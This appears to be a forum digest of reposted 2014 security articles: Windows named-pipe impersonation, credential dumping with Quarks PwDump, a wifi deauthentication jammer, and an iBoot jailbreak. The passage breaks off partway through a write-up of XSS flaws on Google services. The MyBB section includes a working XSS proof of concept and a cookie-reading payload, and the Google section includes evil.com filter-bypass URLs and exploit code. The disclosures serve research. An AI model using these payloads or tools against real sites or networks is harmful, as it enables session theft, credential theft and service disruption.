Nytro

Arch Linux 2014.02.01 Is Now Available for Download February 2nd, 2014, 11:46 GMT · By Marius Nestor I can't believe that it's already February, and that another ISO image of the powerful Arch Linux distribution has been announced yesterday, as expected, on its official website. Unfortunately for some of you, Arch Linux is still not using the recently released Linux kernel 3.13. As such, Arch Linux 2014.02.01 is powered by Linux kernel 3.12.9, which is also the latest stable release of the upstream Linux 3.12 kernel series. Additionally, Arch Linux 2014.02.01 includes all the updated packages that were released during the past month, January 2014. As usual, existing Arch Linux users don’t need this new ISO image, as it's only intended for those of you who want to install Arch Linux on new machines. Arch Linux is a rolling-release Linux operating system, so in order to keep your Arch system up-to-date, use the sudo pacman -Syu or yaourt -Syua commands. Download Arch Linux 2014.02.01 right now from Softpedia. Follow @mariusnestor Sursa: Arch Linux 2014.02.01 Is Now Available for Download

[h=3]Namedpipe Impersonation Attack[/h] Privilege escalation through namedpipe impersonation attack was a real issue back in 2000 when a flaw in the service control manager allowed any user logged onto a machine to steal the identify of SYSTEM. We haven't heard a lot about this topic since then, is it still an issue? First of all, let's talk about the problem. When a process creates a namedpipe server, and a client connects to it, the server can impersonate the client. This is not really a problem, and is really useful when dealing with IPC. The problem arises when the client has more rights than the server. This scenario would create a privilege escalation. It turns out that it was pretty easy to accomplish. For example, let's assume that we have 3 processes: server.exe, client.exe and attacker.exe. Server.exe and client.exe have more privileges than attacker.exe. Client.exe communicates with server.exe using a namedpipe. If attacker.exe manages to create the pipe server before server.exe does, then, as soon as client.exe connects to the pipe, attacker.exe can impersonate it and the game is over. Fortunately, Microsoft implemented and recently documented some restrictions and tools to help you manage the risk. First of all there are some flags buried in the CreateFile documentation to give control to the pipe client over what level of impersonation a server can perform. They are called the "Security Quality Of Service". There are 4 flags to define the impersonation level allowed. SECURITY_ANONYMOUS The server process cannot obtain identification information about the client, and it cannot impersonate the client. SECURITY_IDENTIFICATION The server process can obtain information about the client, such as security identifiers and privileges, but it cannot impersonate the client. ImpersonateNamedpipeClient will succeed, but no resources can be acquired while impersonating the client. The token can be opened and the information it contains can be read. SECURITY_IMPERSONATION - This is the default The server process can impersonate the client's security context on its local system. The server cannot impersonate the client on remote systems. SECURITY_DELEGATION The server process can impersonate the client's security context on remote systems. There are also 2 other flags: SECURITY_CONTEXT_TRACKING Specifies that any changes a client makes to its security context is reflected in a server that is impersonating it. If this option isn't specified, the server adopts the context of the client at the time of the impersonation and doesn't receive any changes. This option is honored only when the client and server process are on the same system. SECURITY_EFFECTIVE_ONLY Prevents a server from enabling or disabling a client's privilege or group while the server is impersonating. Note: Since the MSDN documentation for these flags is really weak, I used the definition that can be found in the book "Microsoft® Windows® Internals, Fourth Edition" by Mark Russinovich and David Solomon. Every time you create a pipe in client mode, you need to find out what the server needs to know about you and pass the right flags to CreateFile. And if you do, don't forget to also pass SECURITY_SQOS_PRESENT, otherwise the other flags will be ignored. Unfortunately, you don't have access to the source code of all the software running on your machine. I bet there are dozen of software running on my machine right now opening pipes without using the SQOS flags. To "fix" that, Microsoft implemented some restrictions about who a server can impersonate in order to minimize the chances of being exploited. A server can impersonate a client only if one of the following is true. The caller has the SeImpersonatePrivilege privilege. The requested impersonation level is SecurityIdentification or SecurityAnonymous. The identity of the client is the same as the server. The token of the client was created using LogonUser from inside the same logon session as the server. Only Administrators/System/SERVICES have the SeImpersonatePrivilege privilege. If the attacker is a member of these groups, you have much bigger problems. The requested impersonation level in our case is SecurityImpersonation, so the second point does not apply. That leaves us with the last two conditions. Should we worry about them? I think so. Here are some examples: I'm on XP. I want to run an untrusted application. Since I read my old posts, I know that I can run the process using a stripped down version of my token. Unfortunately, my restricted token has the same identity as the normal token. It can then try to exploit all applications running on my desktop. This is bad. My main account is not administrator on the machine. When I want to install software, I use RunAs. This brings up a new problem. RunAs uses LogonUser, and it is called from the same logon session! That means that my untrusted application using a restricted token derived from a standard user token can now try to exploit and impersonate a process running with administrator rights! This is worse. But how real is all this? This is hard to say. I don't have an idea about the percentage of applications using the SQOS flags. We must not forget that allowing impersonation is also required and desired in certain cases. For fun I took the first application using namedpipes that came to my mind: Windbg. There is an option in Windbg to do kernel debugging and if the OS you are debugging is inside vmware, you can specify the namedpipe corresponding the COM1 port of the vmware image. By default it is "com_1". My untrusted application running with the restricted token was now listening on com_1, and, easy enough, as soon as I started windbg, the untrusted application was able to steal its token. To be fair I have to say that vmware displayed an error message telling me that the com_1 port was "not configured as expected". I should not have started windbg knowing that. But, eh, who reads error messages? What should we do now? Well, it turns out that Microsoft implemented two new restrictions in windows Vista to fix these problems. I don't think they are documented yet. If the token of a server is restricted, it can impersonate only clients also running with a restricted token. The server cannot impersonate a client running at a higher integrity level. These new restrictions are fixing both my issues. First of all my untrusted application can't be running with a restricted token anymore. Then, even if the untrusted application is running with my standard token, it won't be able to impersonate the processes that I start with the "Run As Administrator" elevation prompt because they are running with a High Integrity Level. Now it is time to come back to the main question: Is it still an issue? My answer is yes. Windows XP is still the most popular Windows version out there and there is no sign that Vista is going to catch up soon. But I have to admit that I'm relieved to see the light at the end of the tunnel! -- Some technical details: When you call ImpersonateNamedPipeClient and none of the conditions is met, the function still succeeds, but the impersonation level of the token is SecurityIdentification. If you want to try for yourself, you can find the code to create a server pipe and a client pipe on my code page. Related link: Impersonation isn't dangerous by David Leblanc Posted by nsylvain at 4:54 PM Sursa: The Final Stream: Namedpipe Impersonation Attack

MRG Effitas automatic XOR decryptor tool Posted by Zoltan Balazs on February 1, 2014 in Latest | 0 comments Malware writers tend to protect their binaries and configuration files with XOR encryption. Luckily, they never heard about the one-time-pad requirement, which requires “never reuse the XOR key”. Binary files usually have long sequence of null bytes, which means the short XOR key (4 ascii characters in most of the cases) used by the malware writers can be spotted in the binary as a recurring pattern. This Python script (tested and developed on Python 3.3) can find these recurring patterns in the beginning of the XOR encrypted binary, calculate the correct “offset” of the key, use this XOR key to decrypt the encrypted file, and check the result for known strings. The tool was able to find the correct XOR key in 90% of the cases, in other cases fine-tuning the default parameters can help. We used this tool to decyrpt the XOR encrypted binaries found in network dumps. For example when exploit kits (e.g. Neutrino) were able to infect the victim, and the payload is delivered to the victim as a XOR encrypted binary. For a list of parameters, run # python auto_xor_decryptor.py -h The tool is released under GPLv3 licence. The script can be found on our Github account: https://github.com/MRGEffitas/scripts/blob/master/auto_xor_decryptor.py An example run of the tool looks like the following: c:\python33\python auto_xor_decryptor.py --input malware\48_.mp3 Auto XOR decryptor by MRG Effitas. Developed and tested on Python 3.3!This tool can automatically find short XOR keys in a XOR encrypted binary file, and use that to decrypt the XOR encrypted binary. Most parameters are good on default but if it is not working for you, you might try to fine-tune those. XOR key: b’626a6b68626a6b68626a6b68626a6b68626a6b68626a6b68626a6b68626a6b68626a6b68626a6b68626a6b68626a6b68626a6b6862? XOR key ascii: b’bjkh’ XOR key hex: b’626a6b68? Offset: 1 Final XOR key: b’jkhb’ Great success! input read from : malware\48_.mp3, output written to : decrypted MRG Effitas Team Sursa: Publishing of MRG Effitas automatic XOR decryptor tool | MRG Effitas

A Field Study of Run-Time Location Access Disclosures on Android Smartphones Huiqing Fu, Yulong Yang, Nileema Shingte, Janne Lindqvist, Marco Gruteser Rutgers University Please contact janne@winlab.rutgers.edu for any inquiries Abstract—Smartphone users are increasingly using apps that can access their location. Often these accesses can be without users knowledge and consent. For example, recent research has shown that installation-time capability disclosures are ineffective in informing people about their apps’ location access. In this paper, we present a four-week field study (N=22) on run-time location access disclosures. Towards this end, we implemented a novel method to disclose location accesses by location-enabled apps on participants’ smartphones. In particular, the method did not need any changes to participants’ phones beyond installing our study app. We randomly divided our participants to two groups: a Disclosure group (N=13), who received our disclosures and a No Disclosure group (N=9) who received no disclosures from us. Our results confirm that the Android platform’s location access disclosure method does not inform participants effectively. Almost all participants pointed out that their location was accessed by several apps they would have not expected to access their location. Further, several apps accessed their location more frequently than they expected. We conclude that our participants appreciated the transparency brought by our run-time disclosures and that because of the disclosures most of them had taken actions to manage their apps’ location access. Download: http://www.winlab.rutgers.edu/~janne/USECfieldstudy.pdf

[h=1]Dementia[/h]Dementia is a proof of concept memory anti-forensic toolkit designed for hiding various artifacts inside the memory dump during memory acquisition on Microsoft Windows operating system. By exploiting memory acquisition tools and hiding operating system artifacts (eg. processes, threads, etc.) from the analysis application, such as Volatility, Memoryze and others. Because of the flaws in some of the memory acquisition tools, Dementia can also hide operating system objects from the analysis tools completely from the user-mode. For further details about Dementia, check the 29c3 presentation (PDF or video below). Downloads Defeating Windows memory forensics.pdf Dementia-1.0-x64.zip Dementia-1.0.zip Sursa: https://code.google.com/p/dementia-forensics/

Quarks PwDump Mon 14 May 2012 By Sébastien Kaczmarek Quarks PwDump is new open source tool to dump various types of Windows credentials: local account, domain accounts, cached domain credentials and bitlocker. The tool is currently dedicated to work live on operating systems limiting the risk of undermining their integrity or stability. It requires administrator's privileges and is still in beta test. Quarks PwDump is a native Win32 open source tool to extract credentials from Windows operating systems. It currently extracts : Local accounts NT/LM hashes + history Domain accounts NT/LM hashes + history stored in NTDS.dit file Cached domain credentials Bitlocker recovery information (recovery passwords & key packages) stored in NTDS.dit JOHN and LC format are handled. Supported OS are Windows XP / 2003 / Vista / 7 / 2008 / 8 Why another pwdump-like dumper tool? No tools can actually dump all kind of hash and bitlocker information at the same time, a combination of tools is always needed. Libesedb (http://sourceforge.net/projects/libesedb/) library encounters some rare crashs when parsing different NTDS.dit files. It's safer to directly use Microsoft JET/ESE API to parse databases originally built with same functions. Bitlocker case has been added even if some specific Microsoft tools could be used to dump those information. (Active Directory addons or VBS scripts) The tool is currently dedicated to work live on operating systems limiting the risk of undermining their integrity or stability. It requires administrator's privileges. We plan to make it work full offline, for example on a disk image. How does it internally work? Case #1: Domain accounts hashes are extracted offline from NTDS.dit It's not currently full offline dump cause Quarks PwDump is dynamically linked with ESENT.dll (in charge of JET databases parsing) which differs between Windows versions. For example, it's not possible to parse Win 2008 NTDS.dit file from XP. In fact, record's checksum are computed in a different manner and database files appear corrupted for API functions. That's currently the main drawback of the tool, everything should be done on domain controller. However no code injection or service installation are made and it's possible to securely copy NTDS.dit file by the use of Microsoft VSS (Volume Shadow Copy Service). Case #2: Bitlocker information dump It's possible to retrieve interesting information from ActiveDirectory if some specific GPO have been applied by domain administrators (mainly "Turn on BitLocker backup to Active Directory" in group policy). Recovery password: it's a 48-digits passphrase which allow a user to mount its partition even if its password has been lost. This password can be used in Bitlocker recovery console. Key Package : it's a binary keyfile which allow an user to decipher data on a damaged disk or partition. It can be used with Microsoft tools, especially Bitlocker Repair Tool. For each entry found in NTDS.dit, Quarks PwDump show recovery password to STDOUT and keyfiles (key packages) are stored to separate files for each recovery GUID: {GUID_1}.pk, {GUID_2}.pk,... Volume GUID: an unique value for each BitLocker-encrypted volume. Recovery GUID: recovery password identifier, it could be the same for different encrypted volumes. Quarks PwDump does no retrieve TPM information yet. When ownership of the TPM is taken as part of turning on BitLocker, a hash of the ownership password can be taken and stored in AD directory service. This information can then be used to reset ownership of the TPM. This feature will be added in a further release. In an enterprise environment, those GPO should be often applied in order to ensure administrators can unlock a protected volume and employers can read specific files following an incident (intrusion or various malicious acts for example). Case #3: Local account and cached domain credentials There aren't something really new here, a lot of tools are already dumping them without any problems. However we have choosed an uncommmon way to dump them, only few tools use this technique. Hashes are extracted live from SAM and SECURITY hive in a proper way without code injection/service. In fact, we use native registry API, especially RegSaveKey() and RegLoadKey() functions which require SeBackup and SeRestore privileges. Next we mount SAM/REGISTRY hives on a different mount point and change all keys ACL in order to extend privileges to Administrator group and not LocalSystem only. That's why we choose to work on a backup to preserve system integrity. Writing this tool was not a really difficult challenge, windows hashes and bitlocker information storage methodology are mostly well documented. However it's an interesting project to understand strange Microsoft's implementation and choices for each kind of storage: High level obfuscation techniques are used for local and domain accounts hashes: many constants, atypical registry value name, useless ciphering layer, hidden constants stored in registry Class attribute,...However, it can be easily defeated. Used algorithms differ sometimes between windows version and global credentials storage approach isn't regular. We can find exhaustively: RC4, MD5, MD4, SHA-256, AES-256, AES-128 and DES. Bitlocker information are stored in cleartext in AD domain services. Project is still in beta test and we would really appreciate to have feedbacks or suggestions/comments about potential bugs. Binary and source code are available on GitHub (GNU GPL v3 license): Quarks PwDump v0.1b: https://github.com/quarkslab/quarkspwdump For NTDS parsing technical details, you can also refer to MISC MAG #59 article by Thibault Leveslin. Finally, we would like to greet NTDS hash dump (Csaba Barta), libesedb and creddump authors for their excellent work. Sursa: Quarks PwDump

Accidental API Key Exposure is a Major Problem This article, about how a security researcher managed to gain access to Prezi's source code by using credentials he found in a public BitBucket repo, became very popular recently. The author concludes his article by saying "Please be aware of what you put up on github/bitbucket." Accidentally posting API keys, as well as passwords and other sensitive information, on public source control repositories is a huge problem. It potentially allows anybody who comes across your code to access data, send communications, or even make purchases on your behalf. And yet API keys exposed in public GitHub repos is a common occurrence. As somebody who has accidentally posted private credentials on GitHub in the past myself, before quickly noticing and taking them down, I was interested to see how widespread the problem of inadvertently publishing private credentials is. I did a quick GitHub search for Twilio auth tokens and was alarmed at the results that were returned. (I had no reason in particular for choosing Twilio tokens over any other API tokens; I'm sure every major API provider is affected.) Combining that search with a simple Ruby script wrapping a regular expression, I was able to discover 187 Twilio auth tokens in a matter of minutes. One hundred and eighty seven. Sitting there waiting to be discovered by a GitHub search. And GitHub would only display the first 1000 results out of around 20,000. But this is just scratching the surface. When people realise that their API credentials are visible on a public repository, their first instinct is, as it should be, to remove them. But the problem is, removing the tokens and committing the result is not enough. While they will no longer appear in a GitHub code search, any sufficiently motivated person can scroll back through your repository's history on GitHub, and find your code containing your tokens, just as it was before you "removed" them. But, especially for side-projects or for casual GitHub users who might not yet fully understand the purpose or features of Git, this potential vulnerability may not be obvious - I have seen more than one person make the mistake of leaving API keys or passwords in their Git history. So what can we do about this? Replace sensitive information with placeholders If you aren't using Git for managing a project, and just want to throw it up on GitHub so you can share your code, the solution is simple: you can just remove your sensitive passwords from the code and replace them with an empty string or “<api key here>” or some other placeholder. But when you're actually using source control for managing your project, this solution starts to fall apart. You need another way of keeping your credentials out of your repository. Storing sensitive information outside of source control Some common methods of storing sensitive information that won't show up in your repository are: Environment variables - these have the added advantage of making it easy to have different API keys or passwords for different environments your application may be deployed on (like development, staging and production for a web app). Config files that are kept out of version control - these are typically JSON or YAML files that contain any sensitive information, like API keys or passwords, that should not be publicly available. Your application can then just import this file and access all of the information it needs. Depending on your programming language of choice, there may be a library available to help you with this. Depending on your programming language of choice, there may be some libraries available to help you with this, like nconf for Node.js, or any of these RubyGems. Removing sensitive information that's already in your repository As stated above, the history features of version control systems mean that simply removing the tokens and then committing the result is not enough. If you can, you might want to consider revoking the keys that have been made public, so that anybody who may have discovered them already will be prevented from using them. If not, your only option is to rewrite your entire commit history since the API keys were added. If you are using git, this is possible with the git-filter-branch command. GitHub has a good tutorial on it that details specifically the problem of removing sensitive data from a Git repository. Please be aware that this can cause problems if there are multiple collaborators on your project, as each collaborator will have to rebase their changes to be on top of yours. Accidental API key exposure is one of those problems that is easy to avoid as long as you keep it in mind from the beginning of a project, but once you've slipped up, it becomes very difficult to fix. By keeping the dangers in mind, and making sure you're always keeping your API keys, passwords, and any other sensitive information out of version control from the beginning, you're protecting yourself from a very real and very severe threat to the security of both you and your users. Sursa: Accidental API Key Exposure is a Major Problem | Ross Penman

MyBB 1.6.12 POST XSS 0day This is a weird bug I found in MyBB. I fuzzed the input of the search.php file. This was my input given. <foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload MyBB throws out a SQL error: SELECT t.tid, t.firstpost FROM mybb_threads t WHERE 1=1 AND t.closed NOT LIKE 'moved|%' AND ( LOWER(t.subject) LIKE '%<foo> <h1> <script> alert (bar) () ; //%' LOWER(t.subject) LIKE '%> < prompt \x41 \%42 constructor onload%') This made me analyze and reverse this to find the cause. After filtering out this was the correct input which can cause this error. This part should be constant or’(“\ To reproduce this issue you can add any char value in front on or’(“\ and 2 char values after or’(“\ and you cannot have any spaces in between them. This will be the skeleton: [1 char value]or’(“\[2 char values] Examples: 1or’(“\00 qor’(“\2a You can have a space like this qor’(“\ a SELECT t.tid, t.firstpost FROM mybb_threads t WHERE 1=1 AND t.closed NOT LIKE 'moved|%' AND ( LOWER(t.subject) LIKE '%qor (%' LOWER(t.subject) LIKE '%\2a%') How to Inject JavaScript and HTML? We can inject HTML + JavaScript but the search.php filters out ‘ “ [] – characters. This is the method you could use inject your payload. If we put our constant in the middle we can inject our payload in front and after it. If we inject it at the beginning of the constant the payload will be stored in this manner. [B]<Payload here>[/B]qor’(“\2a SELECT t.tid, t.firstpost FROM mybb_threads t WHERE 1=1 AND t.closed NOT LIKE 'moved|%' AND ( LOWER(t.subject) LIKE '%[B]<Payload Here>[/B]qor (%' LOWER(t.subject) LIKE '%\2a%') For example if we inject a HTML header at the beginning [B]<h1>Osanda</h1>[/B]qor’(“\2a It will look like this inside the source: SELECT t.tid, t.firstpost FROM mybb_threads t WHERE 1=1 AND t.closed NOT LIKE 'moved|%' AND ( LOWER(t.subject) LIKE '%[B]<h1>Osanda</h1>[/B]qor (%' LOWER(t.subject) LIKE '%\2a%') Now if we try injecting at the end of our payload it will be stored in two places like this in the source. qor’(“\2a[B]<Payload Here>[/B] The payload is thrown out in the SQL error itself. 1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LOWER(t.subject) LIKE '%\2a<payload here>%')' at line 3 The second place is inside the query. SELECT t.tid, t.firstpost FROM mybb_threads t WHERE 1=1 AND t.closed NOT LIKE 'moved|%' AND ( LOWER(t.subject) LIKE '%qor (%' LOWER(t.subject) LIKE '%\2a[B]<payload here>%[/B]') Example: This would be an example of JavaScript being interpreted <script>alert(/Osanda/)</script>. Notice that our string is converted to lower case characters due to the SQL query. Remember this filters out ‘ “ [] — characters. Therefore we can use and external script source for performing further client side attacks. Proof of Concept <html> <!-- Exploit-Title: MyBB 1.6.12 POST XSS 0day Google-Dork: inurl:index.php intext:Powered By MyBB Date: Februrary 2nd of 2014 Bug Discovered and Exploit Author: Osanda Malith Jayathissa Vendor Homepage: http://www.mybb.com Software Link: http://resources.mybb.com/downloads/mybb_1612.zip Version: 1.6.12 (older versions might be vulnerbale) Tested on: Windows 8 64-bit Original write-up: http://osandamalith.wordpress.com/2014/02/02/mybb-1-6-12-post-xss-0day --> <body> <form name="exploit" action="http://localhost/mybb_1612/Upload/search.php" method="POST"> <input type="hidden" name="action" value="do_search" /> <input type="hidden" name="keywords" value="qor'("\2a<script>alert(/XSS/)</script> " /> <script>document.exploit.submit(); </script> </form> </body> </html> POC Video You could do something creative like this in an external source to view the domain, cookies and exploitation beyond the filters. You can define your source like this. <script src=poc />qor'("\2a</script> This will be containing in the poc file. document.write('<h1>MyBB XSS 0day</h1><br/><h2>Domain: ' + document.domain + '</h2><br/> <h3> Osanda and HR</h3><strong>User Cookies: </strong><br/>' + document.cookie); alert('XSS by Osanda & HR'); Thanks to Hood3dRob1n for this idea I have no idea to inject SQL in this bug. You may give it a try and see. Sursa: MyBB 1.6.12 POST XSS 0day | Blog of Osanda Malith

Pwn2Own 2014: Rules and Unicorns Brian Gorenc, Manager, Vulnerability Research, HP Security Research HP’s Zero Day Initiative is once again expanding the scope of its annual Pwn2Own contest, with a new competition that combines multiple vulnerabilities for a challenge of unprecedented difficulty and reward. Last year we launched a plug-in track to the competition, in addition to our traditional browser targets. We’ll continue both tracks this year. For 2014, we’re introducing a complex Grand Prize challenge with multiple components, including a bypass of Microsoft’s Enhanced Mitigation Experience Toolkit (EMET) protections – truly an Exploit Unicorn worthy of myth and legend, plus $150,000 to the researcher who can tame it (for additional background on this new category, see additional blog post here). Pwn2Own prize funds this year are expected to total over half a million dollars (USD) in cash and non-cash awards. As they did last year, our friends at Google are joining us in sponsoring all targets in the 2014 competition. Contest dates The contest will take place March 12-13 in Vancouver, British Columbia, at the CanSecWest 2014 conference. The schedule of contestants and platforms will be determined by random drawing at the conference venue and posted at Pwn2Own.com prior to the start of competition. Rules and prizes The 2014 competition consists of three divisions: Browsers, Plug-Ins, and the Grand Prize. All target machines will be running the latest fully patched versions of the relevant operating systems (Windows 8.1 x64 and OS X Mavericks), installed in their default configurations. The vulnerability or vulnerabilities used in each attack must be unknown and not previously reported to the vendor. A particular vulnerability can only be used once across all categories. The first contestant to successfully compromise a target within the 30-minute time limit wins the prize in that category. The 2014 targets are: Browsers: Google Chrome on Windows 8.1 x64: $100,000 Microsoft Internet Explorer 11 on Windows 8.1 x64: $100,000 Mozilla Firefox on Windows 8.1 x64: $50,000 Apple Safari on OS X Mavericks: $65,000 Plug-ins: Adobe Reader running in Internet Explorer 11 on Windows 8.1 x64: $75,000 Adobe Flash running in Internet Explorer 11 on Windows 8.1 x64: $75,000 Oracle Java running in Internet Explorer 11 on Windows 8.1 x64 (requires click-through bypass): $30,000 “Exploit Unicorn” Grand Prize: SYSTEM-level code execution on Windows 8.1 x64 on Internet Explorer 11 x64 with EMET (Enhanced Mitigation Experience Toolkit) bypass: $150,000* Please see the Pwn2Own 2014 rules for complete descriptions of the challenges. In particular, taming the Exploit Unicorn is a multi-step process, and competitors should be as familiar as possible with the necessary sequence of vulnerabilities required: The initial vulnerability utilized in the attack must be in the browser. The browser’s sandbox must be bypassed using a vulnerability in the sandbox. A separate privilege escalation vulnerability must be used to obtain SYSTEM-level arbitrary code execution on the target. The exploit must work when Microsoft’s Enhanced Mitigation Experience Toolkit (EMET) protections are enabled. In addition to the cash prizes listed above, successful competitors will receive the laptop on which they demonstrate the compromise. They’ll also receive 20,000 ZDI reward points, which immediately qualifies them for Silver standing in the benefits program. (ZDI Silver standing includes a one-time $5,000 cash payout, a 15% monetary bonus on all vulnerabilities submitted to ZDI during the next calendar year, a 25% reward-point bonus on all vulnerabilities submitted to ZDI over the next calendar year, and paid travel and registration to attend the 2014 DEFCON conference in Las Vegas.) As ever, vulnerabilities and exploit techniques revealed by contest winners will be disclosed to the affected vendors, and the proof of concept will become the property of HP in accordance with the HP ZDI program. If the affected vendors wish to coordinate an onsite transfer at the conference venue, HP ZDI is able to accommodate that request. The full set of rules for Pwn2Own 2014 is available here. They may be changed at any time without notice. Registration Pre-registration is required to ensure we have sufficient resources on hand in Vancouver. Please contact ZDI at zdi@hp.com to begin the registration process. (Email only, please; queries via Twitter, blog post, or other means will not be acknowledged or answered.) If we receive more than one registration for any category, we’ll hold a random drawing to determine contestant order. Registration closes at 5pm Pacific time on March 10, 2014. Follow the action Pwn2Own.com will be updated periodically with blogs, photos and videos between now and the competition, and in real time during the event. If it becomes necessary to hold a drawing to determine contestant order, we will also update the site in real time during that process. Follow us on Twitter at @thezdi, and keep an eye on the #pwn2own hashtag for more coverage. Press: Please direct all Pwn2Own or ZDI-related media inquiries to Cassy Lalan, hpesp@bm.com. (*Real-life unicorn prize subject to availability) Sursa: Pwn2Own 2014: Rules and Unicorns - PWN2OWN

[h=1]wifijammer[/h] Continuously jam all wifi clients and access points within range. The effectiveness of this script is constrained by your wireless card. Alfa cards seem to effectively jam within about a block's range with heavy access point saturation. Granularity is given in the options for more effective targeting. Requires: airmon-ng, python 2.7, python-scapy, a wireless card capable of injection [h=2]Usage[/h] [h=3]Simple[/h] python wifijammer.py This will find the most powerful wireless interface and turn on monitor mode. If a monitor mode interface is already up it will use the first one it finds instead. It will then start sequentially hopping channels 1 per second from channel 1 to 11 identifying all access points and clients connected to those access points. On the first pass through all the wireless channels it is only identifying targets. After that the 1sec per channel time limit is eliminated and channels are hopped as soon as the deauth packets finish sending. Note that it will still add clients and APs as it finds them after the first pass through. Upon hopping to a new channel it will identify targets that are on that channel and send 1 deauth packet to the client from the AP, 1 deauth to the AP from the client, and 1 deauth to the AP destined for the broadcast address to deauth all clients connected to the AP. Many APs ignore deauths to broadcast addresses. Sursa: https://github.com/DanMcInerney/wifijammer

Process Explorer v16.0 By Mark Russinovich Published: January 29, 2014 Download Process Explorer (1,215 KB) [TABLE=class: tableCss] [TR] [TD=class: tableCellRateControlCss][/TD] [/TR] [/TABLE] Introduction Ever wondered which program has a particular file or directory open? Now you can find out. Process Explorer shows you information about which handles and DLLs processes have opened or loaded. The Process Explorer display consists of two sub-windows. The top window always shows a list of the currently active processes, including the names of their owning accounts, whereas the information displayed in the bottom window depends on the mode that Process Explorer is in: if it is in handle mode you'll see the handles that the process selected in the top window has opened; if Process Explorer is in DLL mode you'll see the DLLs and memory-mapped files that the process has loaded. Process Explorer also has a powerful search capability that will quickly show you which processes have particular handles opened or DLLs loaded. The unique capabilities of Process Explorer make it useful for tracking down DLL-version problems or handle leaks, and provide insight into the way Windows and applications work. Download Download Process Explorer (1,215 KB) Run Process Explorer now from Live.Sysinternals.com Sursa: Process Explorer

iPhone 4s, iPad 2 / 3, iPad mini, iPod touch 5 Jailbroken For Life! By Ben Reid | February 2nd, 2014 Advertisements iOS hacker iH8sn0w has discovered a way to untether jailbreak devices powered by the Apple A5(X) processor for life, which includes the iPhone 4s, iPod touch 5, the iPad 2 / 3 and iPad mini. Details are relatively scarce at this moment regarding the iBoot exploit, although if the exploits were ever bound together and released in the form of a jailbreak utility, those in ownership of either device would be able to enjoy an potentially indefinite, untethered jailbreak. Even though the jailbreak scene is very much a here-and-now kind of pastime in that most enthusiasts are keen to find way to breach the latest versions, it’s always nice to see progress of any kind. And by the sounds of things, this is a pretty significant inroad. Taking to his Twitter feed, iH8sn0w posted A5 AES keys: So looks like all my A5(X) devices are fully untethered and jailbroken for life now. A5 AES Keys anyone? 4S 7.0.4 iBSS -iv 3a0fc879691a5a359973792bcd367277 -k 371e3aea9121d90b8106228bf2b5ee4c638a0b4837fefbd87a3c0aca646e5996 All A5(X) AES Keys will be posted on @icj_’s icj.me/ios/keys as soon as I clean this up a bit more Then, in speaking to fellow hacker Winocm, one of the guys behind p0sixspwn, iH8sn0w offered something of an insight into how exactly he managed to work the magic: This isn’t a bootrom exploit. Still a very powerful iBoot exploit though (when exploited properly ;P /cc @winocm). One follower also noted that iBoot jailbreaks can be patched by Apple on the fly. iH8sn0w responded to this by noting that they can be patched provided that they are released publicly. Also, to further add fuel to this argument, Saurik took to a thread on Reddit to shed some light on the situation: For informational purposes (as many people reading might not appreciate the difference), to get the encryption keys you only need an "iBoot exploit", not a "bootrom exploit". It is easier to find iBoot exploits (being later in the boot sequence, it has a larger attack surface: it has to be able to parse filesystems, for example), and they do afford more power over the device than an untethered userland exploit (in addition to letting you derive firmware encryption keys, you can boot custom kernels, and you might be able to dump the bootrom itself), but they are software updatable as part of new firmware releases from Apple and may have "insane setup requirements" (like, you might pretty much need an already-jailbroken device to actually setup the exploit). You thereby wouldn’t see an iBoot exploit used for a jailbreak (unless everyone is out of ideas for a very long time): instead, you’d see it hoarded away as a "secret weapon" used by jailbreakers to derive these encryption keys, making it easier to find and implement exploits on newer firmware updates for the same device (especially kernel exploits, where even if you have an arbitrary write vulnerability you are "flying blind" and thinking "ok, now where should I write? I can’t see anything… :’("). But the big question is: will the exploit ever go public? Sadly, it won’t, according to a tweet by Winocm. There’s no doubt that this is very exciting news, and we’ll be keeping a close eye on what remains a developing sequence of events, so stay tuned! You can follow us on Twitter, add us to your circle on Google+ or like our Facebook page to keep yourself updated on all the latest from Microsoft, Google, Apple and the Web. Sursa: iPhone 4s, iPad 2 / 3, iPad mini, iPod touch 5 Jailbroken For Life! | Redmond Pie

Two stories about XSS on Google Story 1. The Little Content Type that Could The vulnerability was found in Feedburner. First, I created a feed and tried to inject malicious data. No success there. Injected data just wouldn’t show up, only harmless links were presented. I took a few more attempts and then I found lots of messages from PodMedic. PodMedic examines links in every feed. If it finds troubles in creating a feed, it reports the cause of such troubles. The messages read that links are incorrect because the content type returned was a text type. Hmm. Ok. I bet the content type on this page isn't filtered. A simple script for my server: <?php header('Content-Type: text/<img src=z onerror=alert(document.domain)>; charset=UTF-8'); ?> And here it is: Story 2. The Little Callback that Could The Feedburner vulnerability was not satisfying. It was quite simple, actually. So I decided to try something else. APIs Explorer on developers.google.com caught my attention after some searching. Google’s APIs Explorer is a tool that helps you to explore various Google APIs interactively. Google also says that with the APIs Explorer, we can browse quickly through available APIs and versions, see methods available for each API and what parameters they support along with inline documentation and blah blah blah. In fact I was interested in cross-domain messaging based on postMessage. A link to the Google API that we are testing can be given in the Base parameter: https://developers.google.com/apis-explorer/?base=https://webapis-discovery.appspot.com/_ah/api#p/ The Base parameter is filtered by certain regular expressions (not quite accurately though) but it is easy to bypass them using a %23 symbol: https://developers.google.com/apis-explorer/?base=https://evil.com%23webapis-discovery.appspot.com/_ah/api#p/admin/reports_v1/ As a result, an iframe with src=evil.com is created and now we’re waiting for messages from it. Every message should have two tokens. First token is in window.name of the iframe, second is given in location.hash. I sniffed messages from https://webapis-discovery.appspot.com/_ah/api and wrote a page that would send the same messages with valid tokens. It worked nice, and I tried to inject some HTML data. No success though. I could change text, image locations but it would not be enough for XSS. There was a documentation link, the location of which could be changed. So I changed it to javascript:alert(document.domain) and it worked perfect. Still not enough. It required user interaction, but I really don't like it. Users never do what you want them to do (click that wrong link, for instance So I found a page on developers.google.com with the callback function (almost all developers think that callbacks are secure). I added redirection to this page with the callback ‘parent.document.links[0].click’ to my exploit after creating the documentation link via postMessage. (Symbols [ and ] were filtered, so actually the callback was as follows: document.body.lastElementChild.previousSibling.lastElementChild.firstElementChild.firstElementChild.lastElementChild.firstElementChild.firstElementChild.firstElementChild.nextSibling). Let’s try it: Done! Works fine and no need for user interaction. The exploit was as follows: token_1 = location.hash.split('rpctoken=')[1]; token_2 = window.name; send_payload(data,token_1,token_2); window.setTimeout('document.location=callback_url;',3000); // Paused because of slow internet connection… And of course I made a cool screenshot I liked that method of exploiting and tried to use it in other services. I used it to steal an OAuth token and to buy any app at Google Play using users’ payment details. Besides, the app could automatically be 